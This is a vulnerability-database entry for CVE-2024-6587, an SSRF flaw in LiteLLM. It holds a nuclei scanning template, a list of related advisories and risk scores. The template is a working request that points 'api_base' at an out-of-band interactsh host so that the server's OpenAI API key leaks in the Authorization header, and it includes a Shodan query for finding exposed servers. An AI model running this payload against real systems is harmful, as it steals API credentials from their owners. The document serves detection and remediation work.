LiteLLM - Server-Side Request Forgery

Reported by ProjectDiscovery, 02 Jun 2026 10:14:34. Type: nuclei. Source: github.com. 63 views.

LiteLLM Server-Side Request Forgery Exposes OpenAI API Key

Related

Reporter: Title (Published)

Circl: CVE-2024-6587 (13 Sep 2024 18:48)
CNNVD: LiteLLM code issue vulnerability (13 Sep 2024 00:00)
CVE: CVE-2024-6587 (13 Sep 2024 15:59)
Cvelist: CVE-2024-6587 SSRF in berriai/litellm (13 Sep 2024 15:59)
Github Security Blog: LiteLLM Server-Side Request Forgery (SSRF) vulnerability (13 Sep 2024 18:31)
NVD: CVE-2024-6587 (13 Sep 2024 16:15)
OSV: GHSA-G26J-5385-HHW3 LiteLLM Server-Side Request Forgery (SSRF) vulnerability (13 Sep 2024 18:31)
RedhatCVE: CVE-2024-6587 (5 Feb 2025 02:55)
The Hacker News: Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack (12 Mar 2025 11:56)
Veracode: Server-Side Request Forgery (SSRF) (16 Sep 2024 09:20)

Nuclei template:

id: CVE-2024-6587

info:
  name: LiteLLM - Server-Side Request Forgery
  author: pdresearch,iamnoooob,rootxharsh,lambdasawa
  severity: high
  description: |
    LiteLLM is vulnerable to Server-Side Request Forgery (SSRF), which exposes OpenAI API keys.
  impact: |
    Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
  remediation: |
    Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
  reference:
    - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
  classification:
    epss-score: 0.88631
    epss-percentile: 0.99524
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:439373620
  tags: cve,cve2024,ssrf,openai,litellm,vkev,vuln,ai

http:
  - raw:
      - |
        POST /chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "model": "command-nightly",
          "messages": [
            {
              "content": "Hello, how are you?",
              "role": "user"
            }
          ],
          "api_base": "https://{{interactsh-url}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "Bearer"
# digest: 4a0a00473045022100a29c2657cc28f06f21c3a21f8488f022fb08888bc5f85aa4ccd324d3e7023af802200e3b516423ed6e04642f27ff562e3f9851fc78660b40b3df1dc8e1b6633c3950:922c64590222798bb761d5b6d8e72950

Scores (current as of 04 Feb 2026 07:00):
Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 7.5
CVSS 3: 7.5
EPSS: 0.88631